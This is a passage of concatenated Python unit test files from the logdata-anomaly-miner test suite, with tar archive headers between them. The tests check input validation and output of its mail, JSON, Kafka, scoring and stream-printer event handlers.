acp[d.CONFIG_KEY_EVENT_COLLECT_TIME] = "" self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_EVENT_COLLECT_TIME] = b"" self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_EVENT_COLLECT_TIME] = None self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_EVENT_COLLECT_TIME] = -1 self.assertRaises(ValueError, d, ac) acp[d.CONFIG_KEY_EVENT_COLLECT_TIME] = 123 DefaultMailNotificationEventHandler(ac) acp[d.CONFIG_KEY_EVENT_COLLECT_TIME] = 123.3 DefaultMailNotificationEventHandler(ac) acp[d.CONFIG_KEY_ALERT_MIN_GAP] = True self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MIN_GAP] = ["Default"] self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MIN_GAP] = {"id": "Default"} self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MIN_GAP] = () self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MIN_GAP] = set() self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MIN_GAP] = "" self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MIN_GAP] = b"" self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MIN_GAP] = None self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MIN_GAP] = -1 self.assertRaises(ValueError, d, ac) acp[d.CONFIG_KEY_ALERT_MIN_GAP] = 123 DefaultMailNotificationEventHandler(ac) acp[d.CONFIG_KEY_ALERT_MIN_GAP] = 123.3 DefaultMailNotificationEventHandler(ac) acp[d.CONFIG_KEY_ALERT_MAX_GAP] = True self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_GAP] = ["Default"] self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_GAP] = {"id": "Default"} self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_GAP] = () self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_GAP] = set() self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_GAP] = "" self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_GAP] = b"" self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_GAP] = None self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_GAP] = -1 self.assertRaises(ValueError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_GAP] = 600 DefaultMailNotificationEventHandler(ac) acp[d.CONFIG_KEY_ALERT_MAX_GAP] = 600.3 DefaultMailNotificationEventHandler(ac) acp[d.CONFIG_KEY_ALERT_MIN_GAP] = 0 acp[d.CONFIG_KEY_ALERT_MAX_GAP] = 0 DefaultMailNotificationEventHandler(ac) acp[d.CONFIG_KEY_ALERT_MIN_GAP] = 1 self.assertRaises(ValueError, d, ac) acp[d.CONFIG_KEY_ALERT_MIN_GAP] = 0 acp[d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE] = True self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE] = ["Default"] self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE] = {"id": "Default"} self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE] = () self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE] = set() self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE] = "" self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE] = b"" self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE] = None self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE] = 0 self.assertRaises(ValueError, d, ac) acp[d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE] = 123 DefaultMailNotificationEventHandler(ac) acp[d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE] = 123.3 DefaultMailNotificationEventHandler(ac) # Test if mail addresses are validated as expected. acp[d.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "root@localhost" acp[d.CONFIG_KEY_MAIL_FROM_ADDRESS] = "root@localhost" DefaultMailNotificationEventHandler(ac) acp[d.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "domain.user1@localhost" self.assertRaises(ValueError, d, ac) acp[d.CONFIG_KEY_MAIL_FROM_ADDRESS] = "domain.user1@localhost" self.assertRaises(ValueError, DefaultMailNotificationEventHandler, ac) acp[d.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "root@notLocalhost" acp[d.CONFIG_KEY_MAIL_FROM_ADDRESS] = "root@localhost" self.assertRaises(ValueError, d, ac) acp[d.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "root@localhost" acp[d.CONFIG_KEY_MAIL_FROM_ADDRESS] = "root@notLocalhost" self.assertRaises(ValueError, d, ac) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/JsonConverterHandlerTest.py000066400000000000000000000150111500476301700305730ustar00rootroot00000000000000import time import unittest from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext class JsonConverterHandlerTest(TestBase): """Unittests for the JsonConverterHandler.""" maxDiff = None output_logline = True resource_name = b"testresource" persistence_id = "Default" def test1receive_event(self): """Test if events are processed correctly and that edge cases are caught in exceptions.""" match_context = DummyMatchContext(b" pid=") fdme = DummyFixedDataModelElement("s1", b" pid=") match_element = fdme.get_match_element("match", match_context) t = time.time() test = "Analysis.TestDetector" event_message = "An event happened!" sorted_log_lines = ["Event happened at /path/ 5 times.", "", "", "", ""] description = "jsonConverterHandlerDescription" expected_string = '{\n "AnalysisComponent": {\n "AnalysisComponentIdentifier": 0,\n "AnalysisComponentType": "%s",\n ' \ '"AnalysisComponentName": "%s",\n "Message": "%s",\n "PersistenceFileName": "%s",\n "AffectedParserPaths":' \ ' [\n "test/path/1",\n "test/path/2"\n ],\n "LogResource": "testresource"\n },\n "LogData": ' \ '{\n "RawLogData": [\n " pid="\n ],\n "Timestamps": [\n %s\n ],\n "DetectionTimestamp":' \ ' %s,\n "LogLinesCount": 5,\n "AnnotatedMatchElement": {\n "match/s1": " pid="\n }\n }%s\n}\n' jch = JsonConverterHandler([self.stream_printer_event_handler], self.analysis_context) log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) self.analysis_context.register_component(self, description) event_data = {"AnalysisComponent": {"AffectedParserPaths": ["test/path/1", "test/path/2"]}} jch.receive_event(test, event_message, sorted_log_lines, event_data, log_atom, self) detection_timestamp = None for line in self.output_stream.getvalue().split("\n"): if "DetectionTimestamp" in line: detection_timestamp = line.split(":")[1].strip(" ,") self.assertEqual(self.output_stream.getvalue(), expected_string % (self.__class__.__name__, description, event_message, self.persistence_id, round(t, 2), detection_timestamp, "")) self.reset_output_stream() # test output_event_handlers self.output_event_handlers = [] self.assertTrue(jch.receive_event(test, event_message, sorted_log_lines, event_data, log_atom, self)) self.assertEqual(self.output_stream.getvalue(), "") self.output_event_handlers = [jch] self.assertTrue(jch.receive_event(test, event_message, sorted_log_lines, event_data, log_atom, self)) val = self.output_stream.getvalue() if val.endswith("\n\n"): val = val[:-1] detection_timestamp = None for line in val.split("\n"): if "DetectionTimestamp" in line: detection_timestamp = line.split(":")[1].strip(" ,") break self.assertEqual(val, expected_string % (self.__class__.__name__, description, event_message, self.persistence_id, round(t, 2), detection_timestamp, "")) self.reset_output_stream() # test suppress detector list self.output_event_handlers = None self.analysis_context.suppress_detector_list = [description] self.assertTrue(jch.receive_event(test, event_message, sorted_log_lines, event_data, log_atom, self)) self.assertEqual(self.output_stream.getvalue(), "") self.output_event_handlers = [jch] self.analysis_context.suppress_detector_list = [] self.assertTrue(jch.receive_event(test, event_message, sorted_log_lines, event_data, log_atom, self)) self.assertEqual(val, expected_string % (self.__class__.__name__, description, event_message, self.persistence_id, round(t, 2), detection_timestamp, "")) def test2validate_parameters(self): """Test all initialization parameters for the event handler. Input parameters must be validated in the class.""" JsonConverterHandler([self.stream_printer_event_handler], self.analysis_context) self.assertRaises(TypeError, JsonConverterHandler, ["default"], self.analysis_context) self.assertRaises(TypeError, JsonConverterHandler, None, self.analysis_context) self.assertRaises(TypeError, JsonConverterHandler, "Default", self.analysis_context) self.assertRaises(TypeError, JsonConverterHandler, b"Default", self.analysis_context) self.assertRaises(TypeError, JsonConverterHandler, True, self.analysis_context) self.assertRaises(TypeError, JsonConverterHandler, 123, self.analysis_context) self.assertRaises(TypeError, JsonConverterHandler, 123.3, self.analysis_context) self.assertRaises(TypeError, JsonConverterHandler, {"id": "Default"}, self.analysis_context) self.assertRaises(TypeError, JsonConverterHandler, (), self.analysis_context) self.assertRaises(TypeError, JsonConverterHandler, set(), self.analysis_context) self.assertRaises(ValueError, JsonConverterHandler, [], self.analysis_context) self.assertRaises(TypeError, JsonConverterHandler, [self.stream_printer_event_handler], self.analysis_context, ["default"]) self.assertRaises(TypeError, JsonConverterHandler, [self.stream_printer_event_handler], self.analysis_context, None) self.assertRaises(TypeError, JsonConverterHandler, [self.stream_printer_event_handler], self.analysis_context, "Default") self.assertRaises(TypeError, JsonConverterHandler, [self.stream_printer_event_handler], self.analysis_context, b"Default") self.assertRaises(TypeError, JsonConverterHandler, [self.stream_printer_event_handler], self.analysis_context, 123) self.assertRaises(TypeError, JsonConverterHandler, [self.stream_printer_event_handler], self.analysis_context, 123.3) self.assertRaises(TypeError, JsonConverterHandler, [self.stream_printer_event_handler], self.analysis_context, {"id": "Default"}) self.assertRaises(TypeError, JsonConverterHandler, [self.stream_printer_event_handler], self.analysis_context, ()) self.assertRaises(TypeError, JsonConverterHandler, [self.stream_printer_event_handler], self.analysis_context, set()) if __name__ == '__main__': unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/KafkaEventHandlerTest.py000066400000000000000000000201721500476301700300150ustar00rootroot00000000000000import time from kafka import KafkaConsumer from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.events.KafkaEventHandler import KafkaEventHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext class KafkaEventHandlerTest(TestBase): """Unittests for the KafkaEventHandler.""" resource_name = b"testresource" output_logline = True topic = "test_topic" group = "test_group" persistence_id = "Default" consumer = None @classmethod def setUpClass(cls): """Start a KafkaConsumer.""" cls.consumer = KafkaConsumer( cls.topic, bootstrap_servers=['localhost:9092'], enable_auto_commit=True, consumer_timeout_ms=60000, group_id=cls.group, value_deserializer=lambda x: x.decode(), api_version=(2, 0, 1), auto_offset_reset="earliest") @classmethod def tearDownClass(cls): """Shutdown the KafkaConsumer.""" cls.consumer.close() def test1receive_event(self): """Test if events are processed correctly and that edge cases are caught in exceptions.""" self.maxDiff = None match_context = DummyMatchContext(b" pid=") fdme = DummyFixedDataModelElement("s1", b" pid=") match_element = fdme.get_match_element("match", match_context) description = "jsonConverterHandlerDescription" t = time.time() test_detector = "Analysis.TestDetector" event_message = "An event happened!" sorted_log_lines = ["Event happened at /path/ 5 times.", "", "", "", ""] exp = '{\n "AnalysisComponent": {\n "AnalysisComponentIdentifier": 0,\n "AnalysisComponentType": "%s",\n ' \ '"AnalysisComponentName": "%s",\n "Message": "%s",\n "PersistenceFileName": "%s",\n "AffectedParserPaths": [\n' \ ' "test/path/1",\n "test/path/2"\n ],\n "LogResource": "testresource"\n },\n "LogData": {\n ' \ '"RawLogData": [\n " pid="\n ],\n "Timestamps": [\n %s\n ],\n "DetectionTimestamp": %s,\n ' \ '"LogLinesCount": 5,\n "AnnotatedMatchElement": {\n "match/s1": " pid="\n }\n }%s\n}\n' # This unittest tests the receive_event method with serialized data from the JsonConverterHandler. jch = JsonConverterHandler([self.stream_printer_event_handler], self.analysis_context) log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) self.analysis_context.register_component(self, description) event_data = {"AnalysisComponent": {"AffectedParserPaths": ["test/path/1", "test/path/2"]}} jch.receive_event(test_detector, event_message, sorted_log_lines, event_data, log_atom, self) output = self.output_stream.getvalue() keh = KafkaEventHandler(self.analysis_context, self.topic, { "bootstrap_servers": ["localhost:9092"], "api_version": (2, 0, 1), "max_block_ms": 120000}) self.assertTrue(keh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) val = self.consumer.__next__().value detection_timestamp = None for line in val.split("\n"): if "DetectionTimestamp" in line: detection_timestamp = line.split(":")[1].strip(" ,") self.assertEqual(val, exp % (self.__class__.__name__, description, event_message, self.persistence_id, round(t, 2), detection_timestamp, "")) # This unittest tests the receive_event method with not serialized data. log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) event_data = {"AnalysisComponent": {"AffectedParserPaths": ["test/path/1", "test/path/2"]}} keh = KafkaEventHandler(self.analysis_context, self.topic, { "bootstrap_servers": ["localhost:9092"], "api_version": (2, 0, 1), "max_block_ms": 120000}) self.assertFalse(keh.receive_event(test_detector, event_message, sorted_log_lines, event_data, log_atom, self)) self.assertRaises(StopIteration, self.consumer.__next__) # test output_event_handlers self.output_event_handlers = [] self.assertTrue(keh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) self.assertRaises(StopIteration, self.consumer.__next__) self.output_event_handlers = [keh] self.assertTrue(keh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) val = self.consumer.__next__().value detection_timestamp = None for line in val.split("\n"): if "DetectionTimestamp" in line: detection_timestamp = line.split(":")[1].strip(" ,") self.assertEqual(val, exp % (self.__class__.__name__, description, event_message, self.persistence_id, round(t, 2), detection_timestamp, "")) # test suppress detector list self.output_event_handlers = None self.analysis_context.suppress_detector_list = [description] self.assertTrue(keh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) self.assertRaises(StopIteration, self.consumer.__next__) self.output_event_handlers = [keh] self.analysis_context.suppress_detector_list = [] self.assertTrue(keh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) val = self.consumer.__next__().value detection_timestamp = None for line in val.split("\n"): if "DetectionTimestamp" in line: detection_timestamp = line.split(":")[1].strip(" ,") self.assertEqual(val, exp % (self.__class__.__name__, description, event_message, self.persistence_id, round(t, 2), detection_timestamp, "")) def test2validate_parameters(self): """Test all initialization parameters for the event handler. Input parameters must be validated in the class.""" options = {"bootstrap_servers": ["localhost:9092"], "api_version": (2, 0, 1), "max_block_ms": 120000} KafkaEventHandler(self.analysis_context, self.topic, options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, ["default"], options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, None, options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, b"Default", options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, True, options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, 123, options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, 123.3, options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, {"id": "Default"}, options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, (), options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, set(), options) self.assertRaises(ValueError, KafkaEventHandler, self.analysis_context, "", options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, ["default"]) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, b"default") self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, "default") self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, None) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, True) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, 123) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, 123.3) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, ()) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, set()) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, {b"bootstrap_servers": ["localhost:9092"]}) KafkaEventHandler(self.analysis_context, self.topic, {}) logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/ScoringEventHandlerTest.py000066400000000000000000000355121500476301700304100ustar00rootroot00000000000000import time from aminer.events.ScoringEventHandler import ScoringEventHandler from aminer.analysis.SlidingEventFrequencyDetector import SlidingEventFrequencyDetector from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchElement import MatchElement from datetime import datetime from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext class ScoringEventHandlerTest(TestBase): """Unittests for the ScoringEventHandler.""" resource_name = b"testresource" pub_url = "tcp://*:5555" sub_url = "tcp://localhost:5555" topic = "test_topic" description = "jsonConverterHandlerDescription" persistence_id = "Default" test_detector = "Analysis.TestDetector" sorted_log_lines = ["Event happend at /path/ 5 times.", "", "", "", ""] expected_string = '{\n "AnalysisComponent": {\n "AnalysisComponentIdentifier": 1,\n "AnalysisComponentType": "%s",\n ' \ '"AnalysisComponentName": "%s",\n "Message": "%s",\n "PersistenceFileName": "Default",\n "TrainingMode": true,\n' \ ' "AffectedLogAtomPaths": [],\n "AffectedLogAtomValues": [\n "/value"\n ],\n ' \ '"LogResource": "SlidingEventFrequencyDetector"\n },\n "FrequencyData": {\n' \ ' "ExpectedLogAtomValuesFrequencyRange": [\n 0,\n 2\n ],\n "LogAtomValuesFrequency": %d,\n ' \ '"WindowSize": 10%s\n },\n "LogData": {\n "RawLogData": [\n "%s"\n ],\n ' \ '"Timestamps": [\n %s\n ],\n "DetectionTimestamp": %s,\n "LogLinesCount": 1\n }%s\n}\n' match_context1 = DummyMatchContext(b" pid=") fdme1 = DummyFixedDataModelElement("s1", b" pid=") match_element1 = fdme1.get_match_element("", match_context1) @classmethod def setUpClass(cls): pass @classmethod def tearDownClass(cls): pass def test1receive_event(self): """Test if events are processed correctly.""" self.maxDiff = None t = round(time.time(), 3) log_atom = LogAtom(self.fdme1.data, ParserMatch(self.match_element1), t, self) self.analysis_context.register_component(self, self.description) event_data = {'AnalysisComponent': {'AffectedParserPaths': ['test/path/1', 'test/path/2']}} json_converter_handler = JsonConverterHandler([self.stream_printer_event_handler], self.analysis_context) scoring_event_handler = ScoringEventHandler([json_converter_handler], self.analysis_context) scoring_event_handler.receive_event(self.test_detector, "Frequency exceeds range for the first time", self.sorted_log_lines, event_data, log_atom, self) self.reset_output_stream() t = time.time() sefd = SlidingEventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[scoring_event_handler], window_size=10, set_upper_limit=2, learn_mode=True, output_logline=False, scoring_path_list=["/value"]) sefd_name = "SlidingEventFrequencyDetector" self.analysis_context.register_component(sefd, sefd_name) sefd.resource_name = b"SlidingEventFrequencyDetector" # Prepare log atoms that represent different amounts of values a, b over time # Four time windows are used. The first time window is used for initialization. The # second time window represents normal behavior, i.e., the frequencies do not change # too much and no anomalies should be generated. The third window contains changes # of value frequencies and thus anomalies should be generated. The fourth time window # only has the purpose of marking the end of the third time window. # The following log atoms are created: # window 1: # value a: 2 times # value b: 1 time # window 2: # value a: 3 times # value b: 1 time # window 3: # value a: 0 times # value b: 2 times # window 4: # value a: 1 time # Start of window 1: log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 1, sefd) log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 3, sefd) log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 7, sefd) # Start of window 2: log_atom4 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 13, sefd) log_atom5 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 17, sefd) log_atom6 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 18, sefd) log_atom7 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 19, sefd) # Start of window 3: log_atom8 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 25, sefd) log_atom9 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 25, sefd) # Start of window 4: log_atom10 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 35, sefd) sefd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 1]) sefd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 1, t + 3]) sefd.receive_atom(log_atom3) detection_timestamp = None for line in self.output_stream.getvalue().split('\n'): if "DetectionTimestamp" in line: detection_timestamp = line.split(':')[1].strip(' ,') break self.assertEqual(self.output_stream.getvalue(), self.expected_string % (sefd_name, sefd_name, "Frequency exceeds range for the first time", 3, "", "a", round(t + 7, 2), detection_timestamp, "")) self.reset_output_stream() self.assertEqual(list(sefd.counts[("/value",)]), [t + 1, t + 3, t + 7]) sefd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 3, t + 7, t + 13]) sefd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 7, t + 13, t + 17]) sefd.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 13, t + 17, t + 18]) sefd.receive_atom(log_atom7) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 13, t + 17, t + 18, t + 19]) sefd.receive_atom(log_atom8) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 17, t + 18, t + 19, t + 25]) sefd.receive_atom(log_atom9) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 17, t + 18, t + 19, t + 25, t + 25]) sefd.receive_atom(log_atom10) for line in self.output_stream.getvalue().split('\n'): if "DetectionTimestamp" in line: detection_timestamp = line.split(':')[1].strip(' ,') break scoring_result = ',\n "Confidence": 0.6,\n "Local_maximum_timestamp": %s,\n "IdValues": [\n "b",\n "a",\n ' \ '"a",\n "b",\n "b"\n ],\n "Scoring": {\n "confidence_absolut": 2.5,\n ' \ '"confidence_mean": 0.5\n }' % str(round(t + 25, 2)) self.assertEqual(self.output_stream.getvalue(), self.expected_string % (sefd_name, sefd_name, "Frequency anomaly detected", 5, scoring_result, "b", round(t + 25, 2), detection_timestamp, "")) self.reset_output_stream() self.assertEqual(list(sefd.counts[("/value",)]), [t + 25, t + 25, t + 35]) def test2validate_parameters(self): """Test all initialization parameters for the event handler. Input parameters must be validated in the class.""" self.assertRaises(TypeError, ScoringEventHandler, "Default", self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, b"Default", self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, True, self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, 123, self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, 123.3, self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, {"id": "Default"}, self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, ["string"], self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, ["string", self.stream_printer_event_handler], self.analysis_context) self.assertRaises(ValueError, ScoringEventHandler, set(), self.analysis_context) self.assertRaises(ValueError, ScoringEventHandler, (), self.analysis_context) self.assertRaises(ValueError, ScoringEventHandler, None, self.analysis_context) self.assertRaises(ValueError, ScoringEventHandler, [], self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], "Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], 123.3) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], ["string"]) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], set()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], None) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights="Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=b"Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=True) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=123) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=123.3) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights={"id": "Default"}) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=["string"]) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=set()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=[]) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights="Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights=b"Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights=123) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights=123.3) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights={"id": "Default"}) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights=["string"]) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights=set()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights=()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights=[]) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length="Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=b"Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=True) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=123.3) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length={"id": "Default"}) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=["string"]) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=set()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=[]) self.assertRaises(ValueError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=0) ScoringEventHandler([self.stream_printer_event_handler], self.analysis_context, weights = {"value": 0.5}, auto_weights=True, auto_weights_history_length=101) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/StreamPrinterEventHandlerTest.py000066400000000000000000000126271500476301700316050ustar00rootroot00000000000000import unittest import sys import io from time import time from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext from datetime import datetime class StreamPrinterEventHandlerTest(TestBase): """Unittests for the StreamPrinterEventHandler.""" def test1receive_event(self): """Test if events are processed correctly and that edge cases are caught in exceptions.""" # In this test case the EventHandler receives multiple lines from the test class. description = "Test1StreamPrinterEventHandler" exp = '%s New value for paths %s: %s\n%s: "%s" (%d lines)\n%s\n' pid = b" pid=" test = "Test.%s" match_s1 = "match/s1" match_s2 = "match/s2" match_context = DummyMatchContext(pid) fdme = DummyFixedDataModelElement("s1", pid) match_element = fdme.get_match_element("match", match_context) self.analysis_context.register_component(self, description) t = time() log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) new_val = "New value for paths %s, %s: %s" % (match_s1, 